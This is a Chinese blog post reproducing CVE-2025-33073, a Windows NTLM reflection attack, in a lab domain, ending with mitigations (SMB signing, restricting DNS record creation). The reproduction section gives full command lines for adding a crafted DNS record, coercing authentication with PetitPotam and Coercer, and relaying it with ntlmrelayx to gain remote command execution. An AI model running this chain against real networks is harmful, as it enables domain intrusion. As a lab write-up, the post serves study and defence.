【内网渗透】也聊CVE-2025-33073 NTLM Reflection攻击

最新推荐文章于 2025-08-22 11:57:00 发布
最新推荐文章于 2025-08-22 11:57:00 发布
阅读量1.6k 收藏 9
点赞数 13
CC 4.0 BY-SA版权
文章标签: 内网渗透 CVE-2025-33073 域渗透 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/148734807

目录

Intro

环境搭建

复现 

修复

Intro

期末周无聊,看看微软最近的这个洞

NVD - CVE-2025-33073

CVE-2025-33073 漏洞属于 NTLM Reflection(NTLM反射)攻击,而NTLM Reflection攻击是NTLM Relay(NTLM 中继)攻击的一种特殊形式,指的是将获得的受害者机器的NTLM认证请求重新反射回发送该请求的原始机器(即受害者机器)

通过利用该漏洞,攻击者只要有任意权限的域用户权限且目标机器不开启 SMB 签名就能远程命令执行,而在大部分情况下,SMB 签名默认只有域控开,域内机器大多数是不开的。

环境搭建

参见:

域环境搭建 - ntrack - 博客园

  • 域:Z3r4y.com

  • 域控:192.168.233.144

  • 攻击者机器(kali):192.168.233.130

  • 攻击目标: CubicU-PC.Z3r4y.com (192.168.233.129)

  • 普通域用户:test

复现 

 创建一个特殊DNS记录,指向攻击者的机器192.168.233.130

python3 dnstool.py -u Z3r4y.com\\test -p "0x401@admin" -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.233.130 --action add 192.168.233.144

  进行强制触发,让目标机器向指定DNS记录进行NTLM认证

python3 PetitPotam.py -d Z3r4y.com -u test -p 0x401@admin localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 192.168.233.129

 接收到目标机器的NTLM

responder -I eth0 -v

进行后续利用

impacket-ntlmrelayx -t 192.168.233.129 -smb2support

顺带一提,用Coercer通用性更强

https://github.com/p0dalirius/Coercer 

  • PetitPotam

    • 仅支持 MS-EFSRPC(Encrypting File System Remote Protocol),通过 EfsRpcOpenFileRaw 强制目标主机向攻击者发起认证。

    • 主要针对 Windows 的 EFS 功能,但微软已通过补丁(如 CVE-2021-36942)修复默认安全问题,限制了其通用性。

  • Coercer

    • 支持多种 RPC/MSRPC 协议,包括但不限于:

      • MS-EFSRPC(同 PetitPotam)

      • MS-RPRN(打印服务,类似 PrintSpooler 漏洞)

      • MS-FSRVP(卷影复制服务)

      • MS-DFSNM(DFS 命名空间管理)

      • 等十几种协议。

通过轮询RPC也可强制访问

python3 Coercer.py coerce -d Z3r4y.com -u test -p 0x401@admin -l localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -t 192.168.233.129

修复

1.开启SMB签名

Set-SmbClientConfiguration -RequireSecuritySignature $true
Set-SmbServerConfiguration -RequireSecuritySignature $true

2.禁止普通域用户新建DNS记录

默认情况下AD域内所有经过身份认证的普通域用户均具备新建 DNS 记录权限

Z3r4y
关注
CVE-2025-33073(Windows提权)
墨痕诉清风的博客
07-14 381
CVE-2025-33073 是一个影响 Windows SMB 服务的新型本地认证反射(NTLM Reflection)漏洞,它绕过了现有的 NTLM 中继防护机制,使攻击者能够通过网络远程以 SYSTEM 权限执行任意代码,无需目标主机上的管理员权限。该漏洞由安全研究员 @mverschu 披露,并在 GitHub 上提供了演示工具,展示了如何结合 DNS 伪装、NTLM 本地认证特性和强制身份验证触发,实现一次完整的 SYSTEM 提权攻击
CVE-2025-26466和CVE-2025-26465,这两个漏洞的解决方式除了升级Openssh9.9p2版本外,是否有其他方式解决?
**My Coding Family**
07-14 1786
🏆本文收录于 《全栈Bug调优(实战版)》 专栏,该专栏专注于分享我在真实项目开发中遇到的各类疑难Bug及其深层成因,并系统提供高效、可复现的解决思路和实操方案。无论你是刚入行的新手开发者,还是拥有多年项目经验的资深工程师,本专栏都将为你提供一条系统化、高质量的问题排查与优化路径,助力你加速成长,攻克技术壁垒,迈向技术价值最大化与职业发展的更高峰🚀!
CVE-2025-33073 NTLM反射 权限提升漏洞复现
渗透之路,攻防之间皆学问
06-18 3061
CVE-2025-33073是一个高危Windows SMB客户端漏洞,可通过NTLM/Kerberos认证反射实现域内SYSTEM权限提权。攻击者只需普通域账号,在满足目标主机未强制SMB签名且域DNS可被篡改的条件下,即可通过构造特殊DNS记录(如server11UWhRC...指向攻击机)、启动SMB中继服务(ntlmrelayx.py)和触发NTLM认证(PetitPotam)三个步骤,将认证反射回目标主机自身,最终获取SYSTEM权限。该漏洞影响所有未安装2025年6月补丁且未启用SMB签名的域内
【漏洞复现】CVE-2025-33073|Windows SMB 权限提升漏洞
信安百科
06-28 481
CVE-2025-33073漏洞存在于Windows SMB中,允许已认证的远程攻击者在未经强制SMB签名的机器上,通过篡改DNS记录强制目标主机进行本地认证反射,最终以SYSTEM权限执行任意命令。
微软重大漏洞来袭! CVE-2025-33073漏洞引爆全球Windows AD域沦陷危机
我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士,专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略,致力于优化企业的IT环境。
06-20 1139
微软重大漏洞来袭! CVE-2025-33073漏洞引爆全球Windows AD域沦陷危机
微软最新补丁修复两处零日漏洞
心雨楼
06-12 1132
微软六月"补丁星期二"总计修复66项安全漏洞。微软刚刚发布了六月的"补丁星期二"更新,针对Windows及微软系统中的66个安全漏洞进行了修复。其中包括两个零日漏洞——一个已被主动利用,另一个已公开披露——以及10个被评定为"严重"级别的缺陷。据Bleeping Computer报道,本月补丁修复了13个权限提升漏洞、3个安全功能绕过漏洞、25个远程代码执行漏洞、17个信息泄露漏洞、6个拒绝服务漏洞及2个欺骗漏洞。其中8个远程代码执行漏洞和2个权限提升漏洞被标记为"严重"。
6月补丁星期二为安全防护人员带来轻松负担
zhidingkeji的博客
06-12 368
本月最紧急的两个修补问题是 CVE-2025-33053,这是 Web Distributed Authoring and Versioning (WEBDAV) 中的远程代码执行 (RCE) 漏洞,以及 CVE-2025-33073,这是 Windows Server Message Block (SMB) 客户端中的权限提升 (EoP) 漏洞。Breen 说:"更令人担忧的是,Microsoft 表示在发布时 Microsoft 365 没有可用的更新,客户将通过此通知的修订版本得到通知。
centos8的openssh9.9p2 RPM包,解决漏洞CVE-2025-26465 和 CVE-2025-26466
03-04
OpenSSH 9.9p2版本是在CentOS 8环境下,针对两个安全漏洞CVE-2025-26465和CVE-2025-26466进行修复的升级版本。CVE-2025-26465漏洞描述为在处理加密过程中的边界条件时可能导致服务崩溃,而CVE-2025-26466则是由于...
openssh-9.9p2的rpm包适用于redhat6/7,centos6/7,修复中危安全漏洞 CVE-2025-26465 和 CVE-2025-26466
03-11
该版本对OpenSSH进行了更新,并修复了两个中危安全漏洞,即CVE-2025-26465和CVE-2025-26466。这些漏洞的修补对于保护系统安全至关重要,因为OpenSSH是一种广泛使用的开源软件,它提供了安全的远程登录和其它网络服务...
OpenSSH 漏洞 CVE-2025-26465 和 CVE-2025-26466 可引发中间人攻击和 DoS 攻击
技术超强的网络安全平台
04-27 1170
2025年2月18日,广泛使用的安全网络实用程序套件OpenSSH中披露了两个严重漏洞。这两个漏洞分别被标识为和。
CVE-2025-34028远程代码执行rce-zip包
04-29
CVE-2025-34028远程代码执行rce-zip包
微软最新WiFi远程代码执行漏洞(CVE-2024-30078)探究
小司机的奥拓
07-08 3616
微软在六月的安全更新中,修复了一个WiFi驱动的漏洞。漏洞描述的攻击场景吸引了很多人的注意:在近源的场景下,攻击者通过发送WiFi数据包来发动攻击。这篇漏洞公告一石激起千层浪:‒ 有人声称以5000美元出售漏洞的PoC;‒ 国内技术论坛上对漏洞的讨论和猜测,如12;‒ 以及github上流传的各种假PoC。首推,被国内营销号各种转发。它一开始声称漏洞原因是SSID溢出,直到广大网友在issues中质疑无法复现,才承认自己只是在尝试复现漏洞,并删光了之前所谓对漏洞原理的描述。
CentreStack 反序列化漏洞复现(CVE-2025-30406)(附脚本)
iSee857的博客
04-15 542
该应用程序在 IIS web.config 文件中使用了硬编码或保护不当的 machineKey,而该文件负责保护 ASP.NET ViewState 数据。” 如果攻击者获取或预测了 machineKey,他们就可以伪造能够通过完整性检查的 ViewState 有效载荷。在某些情况下,这可能会导致 ViewState 反序列化攻击,从而可能导致 Web 服务器上的远程代码执行 (RCE)(CVE-2025-30406)
[复现] CVE-2025-33053
安全小白,希望我的文章对你有所帮助。
06-29 1337
本地复现CVE-2025-33053
「Nginx漏洞复现与防御实战|2024最新CVE解析(含目录遍历/文件解析绕过/反向代理漏洞EXP复现+安全加固方案)渗透测试工程师必看」
浩策盾悟
03-02 7406
通过访问config.do配置页面,先更改Work Home工作目录,用有效的已部署的Web应用目录替换默认的存储JKS Keystores文件的目录,之后使用"添加Keystore设置"的功能,可上传恶意的JSP脚本文件。而反序列话则是再把字节序列恢复为java对象的过程,然而就在这一转一变得过程中,程序员的过滤不严格,就可以导致恶意构造的代码的实现。IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。
MS17_010
csu_vc的博客
11-07 2394
漏洞信息 多个 Windows SMB 远程执行代码漏洞 当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。 为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。从内存进程获取敏感信息。 修补方法
2025年游戏盾SDK动态加密技术全景解析:从防御破解到重塑游戏安全基石
最新发布
2403_86962125的博客
08-22 659
2025年的游戏安全战争,本质是“加密强度”与“破解成本”的博弈。游戏盾SDK通过动态密钥协商×协议混淆×多层加密×AI自适应的四维体系,将破解成本提升至黑产无法承受的高度。当攻击者的ROI(投资回报率)趋于零时,你的游戏才真正安全。立即行动现有项目评估:使用抓包工具测试当前游戏协议是否明文传输逐步升级:从关键接口(登录/支付)开始部署动态加密长期规划:制定向后量子密码迁移的路线图。
解决远程桌面连接“为安全考虑,已锁定该用户帐户,原因是登录尝试或密码更改尝试过多”问题
goolean的专栏
08-21 296
1、登陆阿里云后台通过ECS的VNC连接,不要直接输入用户名密码,那种还是不让登陆,直接开始vnc连接,出现window登陆画面后,再输入密码。3.依次选择:计算机配置→Windows设置→安全设置→帐户策略→帐户锁定策略。登陆后,运行 gpedit.msc 打开组策略。5.改为“0”,会提示这个,忽略,确定即可。鼠标点不动确定,直接按回车键就可以了。4.双击“帐户锁定阈值”
修复CVE-2025-6018和CVE-2025-6019漏洞
08-07
CVE-2025-6018 和 CVE-2025-6019 是两个特定于某些软件或服务的安全漏洞。尽管没有直接提及这两个漏洞的详细信息,但可以根据常见的漏洞修复方法提供指导。修复此类安全漏洞通常涉及以下几个方面:代码审查、输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值